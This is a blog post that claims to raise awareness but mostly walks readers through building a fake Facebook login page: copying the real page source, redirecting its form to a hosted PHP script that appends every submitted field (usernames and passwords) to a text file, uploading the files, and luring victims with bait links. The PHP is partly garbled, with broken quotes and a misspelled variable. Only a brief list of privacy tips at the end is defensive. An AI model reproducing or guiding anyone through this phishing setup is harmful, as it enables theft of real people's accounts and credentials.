How your Facebook account will be hacked in seconds

Last Updated on December 14, 2020

hack facebook account

I have kept writing on maintaining Facebook’s privacy and some features. I am a fan of Facebook and would love everybody to be carried along on the same boat with us here. Hacking Facebook account has been so common in recent years till date. It would only take a professional phishing agent few seconds to raid your Facebook account.

Today, the frustration of been hacked has been awry considering victim’s privacy. Although, a neutral person can drill in your Facebook login details. A neutral person in the sense, he/she has no proper understanding of black hat hacking. They just followed some simple steps before landing on your page.

ALSO READ: Facebook privacy tips 2016

In this post, you will be exposed on how some of these Facebook crackers / hackers maneuvers your Facebook account details into tricking you to believe that what has been sent to you is the real Facebook. What they use is what is called Phishing method. I will explain the method later. You will be prompted to enter your FB login details to access some purported stuff which are really false.

How your Facebook account will be hacked in seconds

The below steps are how FB login crackers would mislead your the more you look the less you see mind to their corrupted hosted site. I would urge you to take it one after the other. Take every written text as a normal text, just copy and paste unless you are a PHP ninja.

  • Requirements:
  • PC or Mac
  • Internet connection
  • Browser (Chrome, Firefox, EDGE, Opera, Safari,…)
  • Text editor (Notepad, Notepad++, Sublime Text, Atom,…)
  • Little or no knwoledge in PHP

Creating Fake Facebook Landing page

hack facebook account
You should see action inside the circled portion
  1. Launch Facebook on PC by entering the URL into browser address bar. If you are currently logged in, kindly logout for this session.
  2. When logout, right click and choose “View page source” or CTRL + U.
  3. Do not panic! From the obfuscated window that shows up, press CTRL + A to select all. Now press CTRL + C to copy into your clipboard ready to paste.
  4. Open your text editor and press CTRL + P to paste what you copied from source page.
  5. Now, press CTRL + F to find the word “action=”.
  6. You would see something like action=”″
  7. I would like you to remove anything inside action=” ” and replace it with any custom local url. It could be a local url of your domain addon or free domain sites usually suffixed with .web extensions (.php, .html,.js).

For example: action=”” or action=””
Then save it as index.htm

It is time to create a phishing page to redirect entries from fake Facebook page

Open a new notepad window or any of your favorite text editor. Remember, notepad has been installed on your PC so you needn’t worry about not having a copy.
Copy and paste these lines of statements into your text editor.

[tooltip url=”#” title=”hover to view phishing Script”]
 header(‘location: Page on’);
 $username_lists = username_list.txt;
 $handle = fopen(‘$username_lists’, a);
 foreach($_POST as $variable => $val){
  fwrite($handle, $variable);
  fwrite($handle, “=”);
  fwrite($handle, $val);
  fwrite($hadnle, “rn”);

 fwrite($handle, “rn”);




Then save this as something like “” depending on what server you are using. Remember, we earlier created “index.htm” and now something like “”. If your WordPress site is, you may call it “
“. If you are using Blogger blog designer, you should create an account with either or Try to learn how to add addon domain. Here is our file history


You just programmed working on file handling in PHP. What they actually did was to redirect you to google. The variable name $username_lists will be created in your server side manager. It appends every list of collected FB login details repeatedly as long as victims keep entering.

ALSO READ: Don’t want to lose your Facebook account

It is time to upload our two files to the internet. You are required to login into your cpanel for WordPress users and My3GB or 00WebHost users. Naturally, to access websites with cpanel, you have to include it this way, Click on File manager to upload your files.

Your own fake Facebook address is ready for who to destroy.

How do hackers actually get people to open their page?

It is very simple. There are people they call wannabe bloggers. They really have no intent for blogging ie. they enjoy wasting ones time and energy. They are your very own friends on Facebook. When they share these fake Facebook links on your timeline, groups or even tag you to it, they back it up with enticing offers or pleasurable captions like seeing someones nakedness so that whenever you click on it, you would be requested to login first.

Unluckily for you after logging, YOU HAVE BEEN SCAMMED 100% in a broad day light!

For bloggers, they will label it as sort of sponsored links like those of enlarge your manhood within 2 weeks, watch pastor and that woman and among others. Once you accept, there may be no going back.

How do they get your FB login details

When you must have logged in using their fake FB link, there is a text file named from the code you just copied, username_list.txt. Login details are appended each time a user enters login details. Your data will be sent to this other guy. This is exactly how a Trojan horse virus or malware work.

To view history, simply go to your file manager and open the file username_list.txt. Lo and behold.

How to avoid hackers from posting, tagging you on outbound links on Facebook.

  • Simply set your privacy setting for tagging to manual review and only you to post on your wall.
  • Do not click on untrusted links
  • Do not sign in to Facebook from external links from blog sites
  • Use Facebook for Android
  • Access Facebook with only on PC or Mac.
Disclaimer: This post was written as an eye witness and awareness to some background activities on Facebook and how to stop it. We are not responsible to any further action hence from you. It is educational.

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.